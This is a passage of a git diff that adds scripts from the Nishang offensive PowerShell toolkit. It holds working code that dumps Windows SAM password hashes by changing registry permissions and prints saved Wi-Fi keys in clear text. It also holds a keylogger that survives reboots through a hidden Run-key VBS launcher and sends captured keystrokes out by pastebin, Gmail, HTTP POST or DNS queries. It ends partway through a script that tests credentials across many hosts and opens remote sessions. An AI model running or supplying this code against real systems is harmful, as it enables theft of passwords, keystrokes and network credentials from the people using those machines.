0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
|
||||||
|
return ,$b2;
|
||||||
|
}
|
||||||
|
|
||||||
|
function Get-HBootKey
|
||||||
|
{
|
||||||
|
param([byte[]]$bootkey);
|
||||||
|
$aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
|
||||||
|
$anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
|
||||||
|
$k = Get-Item HKLM:\SAM\SAM\Domains\Account;
|
||||||
|
if (-not $k) {return $null}
|
||||||
|
[byte[]]$F = $k.GetValue("F");
|
||||||
|
if (-not $F) {return $null}
|
||||||
|
$rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
|
||||||
|
$rc4 = NewRC4 $rc4key;
|
||||||
|
return ,($rc4.encrypt($F[0x80..0x9F]));
|
||||||
|
}
|
||||||
|
|
||||||
|
function Get-UserName([byte[]]$V)
|
||||||
|
{
|
||||||
|
if (-not $V) {return $null};
|
||||||
|
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
|
||||||
|
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
|
||||||
|
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
|
||||||
|
}
|
||||||
|
|
||||||
|
function Get-UserHashes($u, [byte[]]$hbootkey)
|
||||||
|
{
|
||||||
|
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
|
||||||
|
if ($u.HashOffset + 0x28 -lt $u.V.Length)
|
||||||
|
{
|
||||||
|
$lm_hash_offset = $u.HashOffset + 4;
|
||||||
|
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
|
||||||
|
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
|
||||||
|
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
|
||||||
|
}
|
||||||
|
elseif ($u.HashOffset + 0x14 -lt $u.V.Length)
|
||||||
|
{
|
||||||
|
$nt_hash_offset = $u.HashOffset + 8;
|
||||||
|
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
|
||||||
|
}
|
||||||
|
return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
|
||||||
|
}
|
||||||
|
|
||||||
|
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
|
||||||
|
{
|
||||||
|
[byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
|
||||||
|
# LM Hash
|
||||||
|
if ($enc_lm_hash)
|
||||||
|
{
|
||||||
|
$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
|
||||||
|
}
|
||||||
|
|
||||||
|
# NT Hash
|
||||||
|
if ($enc_nt_hash)
|
||||||
|
{
|
||||||
|
$nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
|
||||||
|
}
|
||||||
|
|
||||||
|
return ,($lmhash,$nthash)
|
||||||
|
}
|
||||||
|
|
||||||
|
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
|
||||||
|
{
|
||||||
|
$deskeys = sid_to_key $rid;
|
||||||
|
$md5 = [Security.Cryptography.MD5]::Create();
|
||||||
|
$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
|
||||||
|
$rc4 = NewRC4 $rc4_key;
|
||||||
|
$obfkey = $rc4.encrypt($enc_hash);
|
||||||
|
$hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
|
||||||
|
(des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
|
||||||
|
return ,$hash;
|
||||||
|
}
|
||||||
|
|
||||||
|
function Get-UserKeys
|
||||||
|
{
|
||||||
|
ls HKLM:\SAM\SAM\Domains\Account\Users |
|
||||||
|
where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
|
||||||
|
Add-Member AliasProperty KeyName PSChildName -PassThru |
|
||||||
|
Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
|
||||||
|
Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
|
||||||
|
Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
|
||||||
|
Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
|
||||||
|
}
|
||||||
|
|
||||||
|
function DumpHashes
|
||||||
|
{
|
||||||
|
LoadApi
|
||||||
|
$bootkey = Get-BootKey;
|
||||||
|
$hbootKey = Get-HBootKey $bootkey;
|
||||||
|
Get-UserKeys | %{
|
||||||
|
$hashes = Get-UserHashes $_ $hBootKey;
|
||||||
|
"{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
|
||||||
|
[BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
|
||||||
|
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
#http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
|
||||||
|
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
|
||||||
|
{
|
||||||
|
Write-Warning "Script requires elevated or administrative privileges."
|
||||||
|
Return
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
#Set permissions for the current user.
|
||||||
|
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
|
||||||
|
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
|
||||||
|
"FullControl",
|
||||||
|
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
|
||||||
|
[System.Security.AccessControl.PropagationFlags]"None",
|
||||||
|
[System.Security.AccessControl.AccessControlType]"Allow")
|
||||||
|
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
|
||||||
|
"SAM\SAM\Domains",
|
||||||
|
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
|
||||||
|
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
|
||||||
|
$acl = $key.GetAccessControl()
|
||||||
|
$acl.SetAccessRule($rule)
|
||||||
|
$key.SetAccessControl($acl)
|
||||||
|
|
||||||
|
DumpHashes
|
||||||
|
|
||||||
|
#Remove the permissions added above.
|
||||||
|
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
|
||||||
|
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
|
||||||
|
Set-Acl HKLM:\SAM\SAM\Domains $acl
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
28
aspx/nishang/Gather/Get-WLAN-Keys.ps1
Normal file
28
aspx/nishang/Gather/Get-WLAN-Keys.ps1
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which dumps keys for WLAN profiles.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload dumps keys in clear text for saved WLAN profiles.
|
||||||
|
The payload must be run from as administrator to get the keys.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Get-WLAN-Keys
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://poshcode.org/1700
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function Get-Wlan-Keys
|
||||||
|
{
|
||||||
|
|
||||||
|
[CmdletBinding()]
|
||||||
|
Param ()
|
||||||
|
|
||||||
|
$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()}
|
||||||
|
$exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)}
|
||||||
|
$exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear}
|
||||||
|
|
||||||
|
}
|
388
aspx/nishang/Gather/Keylogger.ps1
Normal file
388
aspx/nishang/Gather/Keylogger.ps1
Normal file
|
@ -0,0 +1,388 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which logs keys.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
|
||||||
|
The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded
|
||||||
|
using the Parse_Key script in nishang.
|
||||||
|
|
||||||
|
.PARAMETER persist
|
||||||
|
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
|
||||||
|
|
||||||
|
.PARAMETER ExfilOption
|
||||||
|
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
|
||||||
|
|
||||||
|
.PARAMETER dev_key
|
||||||
|
The Unique API key provided by pastebin when you register a free account.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER username
|
||||||
|
Username for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER password
|
||||||
|
Password for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL of the webserver where POST requests would be sent.
|
||||||
|
|
||||||
|
.PARAMETER DomainName
|
||||||
|
The DomainName, whose subdomains would be used for sending TXT queries to.
|
||||||
|
|
||||||
|
.PARAMETER AuthNS
|
||||||
|
Authoritative Name Server for the domain specified in DomainName
|
||||||
|
|
||||||
|
.PARAMETER MagicString
|
||||||
|
The string which when found at CheckURL will stop the keylogger.
|
||||||
|
|
||||||
|
.PARAMETER CheckURL
|
||||||
|
The URL which would contain the MagicString used to stop keylogging.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\Keylogger.ps1
|
||||||
|
The payload will ask for all required options.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\Keylogger.ps1 http://example.com stopthis
|
||||||
|
Use above when using the payload from non-interactive shells and no exfiltration is required.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\Keylogger.ps1 http://example.com stopthis -exfil <dev_key> <username> <pass> 3
|
||||||
|
Use above when using the payload from non-interactive shells or you don't want the payload to ask for any options.
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\Keylogger.ps1 -persist
|
||||||
|
|
||||||
|
Use above for reboot persistence.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$persist,
|
||||||
|
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$exfil,
|
||||||
|
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$CheckURL,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$MagicString,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
|
||||||
|
[String]
|
||||||
|
$ExfilOption,
|
||||||
|
|
||||||
|
[Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$dev_key = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$username = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$password = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$URL = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$DomainName = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$AuthNS = "null"
|
||||||
|
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
$functions = {
|
||||||
|
|
||||||
|
function Keylogger
|
||||||
|
{
|
||||||
|
Param (
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$MagicString,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$CheckURL
|
||||||
|
)
|
||||||
|
|
||||||
|
$signature = @"
|
||||||
|
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
|
||||||
|
public static extern short GetAsyncKeyState(int virtualKeyCode);
|
||||||
|
"@
|
||||||
|
$getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru
|
||||||
|
$check = 0
|
||||||
|
while ($true)
|
||||||
|
{
|
||||||
|
Start-Sleep -Milliseconds 40
|
||||||
|
$logged = ""
|
||||||
|
$result=""
|
||||||
|
$shift_state=""
|
||||||
|
$caps_state=""
|
||||||
|
for ($char=1;$char -le 254;$char++)
|
||||||
|
{
|
||||||
|
$vkey = $char
|
||||||
|
$logged = $getKeyState::GetAsyncKeyState($vkey)
|
||||||
|
if ($logged -eq -32767)
|
||||||
|
{
|
||||||
|
if(($vkey -ge 48) -and ($vkey -le 57))
|
||||||
|
{
|
||||||
|
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
|
||||||
|
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
|
||||||
|
if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
|
||||||
|
{
|
||||||
|
$result = "S-" + $vkey
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$result = $vkey
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif(($vkey -ge 64) -and ($vkey -le 90))
|
||||||
|
{
|
||||||
|
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
|
||||||
|
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
|
||||||
|
$caps_state = [console]::CapsLock
|
||||||
|
if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state)
|
||||||
|
{
|
||||||
|
$result = "S-" + $vkey
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$result = $vkey
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222)))
|
||||||
|
{
|
||||||
|
$left_shift_state = $getKeyState::GetAsyncKeyState(160)
|
||||||
|
$right_shift_state = $getKeyState::GetAsyncKeyState(161)
|
||||||
|
if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
|
||||||
|
{
|
||||||
|
$result = "S-" + $vkey
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$result = $vkey
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$result = $vkey
|
||||||
|
}
|
||||||
|
$now = Get-Date;
|
||||||
|
$logLine = "$result "
|
||||||
|
$filename = "$env:temp\key.log"
|
||||||
|
Out-File -FilePath $fileName -Append -InputObject "$logLine"
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$check++
|
||||||
|
if ($check -eq 6000)
|
||||||
|
{
|
||||||
|
$webclient = New-Object System.Net.WebClient
|
||||||
|
$filecontent = $webclient.DownloadString("$CheckURL")
|
||||||
|
if ($filecontent -eq $MagicString)
|
||||||
|
{
|
||||||
|
break
|
||||||
|
}
|
||||||
|
$check = 0
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function Keypaste
|
||||||
|
{
|
||||||
|
Param (
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$ExfilOption,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$dev_key,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$username,
|
||||||
|
|
||||||
|
[Parameter(Position = 3, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$password,
|
||||||
|
|
||||||
|
[Parameter(Position = 4, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$URL,
|
||||||
|
|
||||||
|
[Parameter(Position = 5, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$AuthNS,
|
||||||
|
|
||||||
|
[Parameter(Position = 6, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$MagicString,
|
||||||
|
|
||||||
|
[Parameter(Position = 7, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$CheckURL
|
||||||
|
)
|
||||||
|
|
||||||
|
$check = 0
|
||||||
|
while($true)
|
||||||
|
{
|
||||||
|
$read = 0
|
||||||
|
Start-Sleep -Seconds 5
|
||||||
|
$pastevalue=Get-Content $env:temp\key.log
|
||||||
|
$read++
|
||||||
|
if ($read -eq 30)
|
||||||
|
{
|
||||||
|
Out-File -FilePath $env:temp\key.log -Force -InputObject " "
|
||||||
|
$read = 0
|
||||||
|
}
|
||||||
|
$now = Get-Date;
|
||||||
|
$name = $env:COMPUTERNAME
|
||||||
|
$paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
|
||||||
|
function post_http($url,$parameters)
|
||||||
|
{
|
||||||
|
$http_request = New-Object -ComObject Msxml2.XMLHTTP
|
||||||
|
$http_request.open("POST", $url, $false)
|
||||||
|
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
|
||||||
|
$http_request.setRequestHeader("Content-length", $parameters.length);
|
||||||
|
$http_request.setRequestHeader("Connection", "close")
|
||||||
|
$http_request.send($parameters)
|
||||||
|
$script:session_key=$http_request.responseText
|
||||||
|
}
|
||||||
|
|
||||||
|
function Compress-Encode
|
||||||
|
{
|
||||||
|
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
$encdata = [string]::Join("`n", $pastevalue)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
|
||||||
|
$sw = New-Object System.IO.StreamWriter($cs)
|
||||||
|
$sw.Write($encdata)
|
||||||
|
$sw.Close();
|
||||||
|
$Compressed = [Convert]::ToBase64String($ms.ToArray())
|
||||||
|
$Compressed
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($exfiloption -eq "pastebin")
|
||||||
|
{
|
||||||
|
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
|
||||||
|
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
|
||||||
|
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
|
||||||
|
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "gmail")
|
||||||
|
{
|
||||||
|
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
|
||||||
|
$smtpserver = “smtp.gmail.com”
|
||||||
|
$msg = new-object Net.Mail.MailMessage
|
||||||
|
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
|
||||||
|
$smtp.EnableSsl = $True
|
||||||
|
$smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”);
|
||||||
|
$msg.From = “$username@gmail.com”
|
||||||
|
$msg.To.Add(”$username@gmail.com”)
|
||||||
|
$msg.Subject = $pastename
|
||||||
|
$msg.Body = $pastevalue
|
||||||
|
if ($filename)
|
||||||
|
{
|
||||||
|
$att = new-object Net.Mail.Attachment($filename)
|
||||||
|
$msg.Attachments.Add($att)
|
||||||
|
}
|
||||||
|
$smtp.Send($msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "webserver")
|
||||||
|
{
|
||||||
|
$Data = Compress-Encode
|
||||||
|
post_http $URL $Data
|
||||||
|
}
|
||||||
|
elseif ($ExfilOption -eq "DNS")
|
||||||
|
{
|
||||||
|
$code = Compress-Encode
|
||||||
|
$lengthofsubstr = 0
|
||||||
|
$queries = [int]($code.Length/63)
|
||||||
|
while ($queries -ne 0)
|
||||||
|
{
|
||||||
|
$querystring = $code.Substring($lengthofsubstr,63)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
|
||||||
|
$lengthofsubstr += 63
|
||||||
|
$queries -= 1
|
||||||
|
}
|
||||||
|
$mod = $code.Length%63
|
||||||
|
$query = $code.Substring($code.Length - $mod, $mod)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
$check++
|
||||||
|
if ($check -eq 6000)
|
||||||
|
{
|
||||||
|
$check = 0
|
||||||
|
$webclient = New-Object System.Net.WebClient
|
||||||
|
$filecontent = $webclient.DownloadString("$CheckURL")
|
||||||
|
if ($filecontent -eq $MagicString)
|
||||||
|
{
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
$modulename = $script:MyInvocation.MyCommand.Name
|
||||||
|
if($persist -eq $True)
|
||||||
|
{
|
||||||
|
$name = "persist.vbs"
|
||||||
|
$options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)"
|
||||||
|
$options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)"
|
||||||
|
$func = $functions.Tostring()
|
||||||
|
Out-File -InputObject '$functions = {' -Force $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $func -Append $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename
|
||||||
|
Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename
|
||||||
|
|
||||||
|
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
|
||||||
|
start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Keylogger $MagicString $CheckURL
|
||||||
|
}
|
||||||
|
}
|
BIN
aspx/nishang/Misc/Nishang_Logo.png
Normal file
BIN
aspx/nishang/Misc/Nishang_Logo.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 5 KiB |
BIN
aspx/nishang/Misc/Nishang_logo_small.png
Normal file
BIN
aspx/nishang/Misc/Nishang_logo_small.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.1 KiB |
31
aspx/nishang/Misc/Speak.ps1
Normal file
31
aspx/nishang/Misc/Speak.ps1
Normal file
|
@ -0,0 +1,31 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload to which "speaks" the given sentence
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload uses the Speech API and the given senetence
|
||||||
|
is spoken in the MS Narrator's voice.
|
||||||
|
|
||||||
|
.PARAMETER Sentence
|
||||||
|
The sentence to be spoken
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Speak <senetence>
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Speak
|
||||||
|
{
|
||||||
|
Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$Sentence
|
||||||
|
)
|
||||||
|
(new-object -com SAPI.SpVoice).speak("$Sentence")
|
||||||
|
}
|
104
aspx/nishang/Pivot/Create-MultipleSessions.ps1
Normal file
104
aspx/nishang/Pivot/Create-MultipleSessions.ps1
Normal file
|
@ -0,0 +1,104 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the script is run
|
||||||
|
from a powershell session with local or global admin credentials (or from a powershell session started with hashes of such account using WCE), it should be used
|
||||||
|
without the -Creds parameter. Use the -CreateSessions parameter to create PSSessions.
|
||||||
|
|
||||||
|
.PARAMETER filename
|
||||||
|
Path to the file which stores list of servers.
|
||||||
|
|
||||||
|
.PARAMETER Creds
|
||||||
|
Use this parameter to specify username (in form of domain\username) and password.
|
||||||
|
|
||||||
|
.PARAMETER CreateSessions
|
||||||
|
Use this parameter to make the script create PSSessions to targets on which the credentials worked.
|
||||||
|
|
||||||
|
.PARAMETER VerboseErrors
|
||||||
|
Use this parameter to get verbose error messages.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Create-MultipleSessions -filename .\servers.txt
|
||||||
|
Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Create-MultipleSessions -filename .\servers.txt -Creds
|
||||||
|
Above command asks the user to provide username and passowrd to check on remote computers.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Create-MultipleSessions -filename .\servers.txt -CreateSessions
|
||||||
|
Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/2013/04/poshing-the-hashes.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Create-MultipleSessions
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param (
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$filename,
|
||||||
|
|
||||||
|
[Parameter(Mandatory = $False)]
|
||||||
|
[Switch]
|
||||||
|
$Creds,
|
||||||
|
|
||||||
|
[Parameter(Mandatory = $False)]
|
||||||
|
[Switch]
|
||||||
|
$CreateSessions,
|
||||||
|
|
||||||
|
[Parameter(Mandatory = $False)]
|
||||||
|
[Switch]
|
||||||
|
$VerboseErrors
|
||||||
|
)
|
||||||
|
|
||||||
|
$ErrorActionPreference = "SilentlyContinue"
|
||||||
|
if ($VerboseErrors)
|
||||||
|
{
|
||||||
|
$ErrorActionPreference = "Continue"
|
||||||
|
}
|
||||||
|
$servers = Get-Content $filename
|
||||||
|
|
||||||
|
if ($Creds)
|
||||||
|
{
|
||||||
|
$Credentials = Get-Credential
|
||||||
|
$CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server -Credential $Credentials'
|
||||||
|
$SessionCommand = 'New-PSSession -ComputerName $server -Credential $Credentials'
|
||||||
|
}
|
||||||
|
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server'
|
||||||
|
$SessionCommand = 'New-PSSession -ComputerName $server'
|
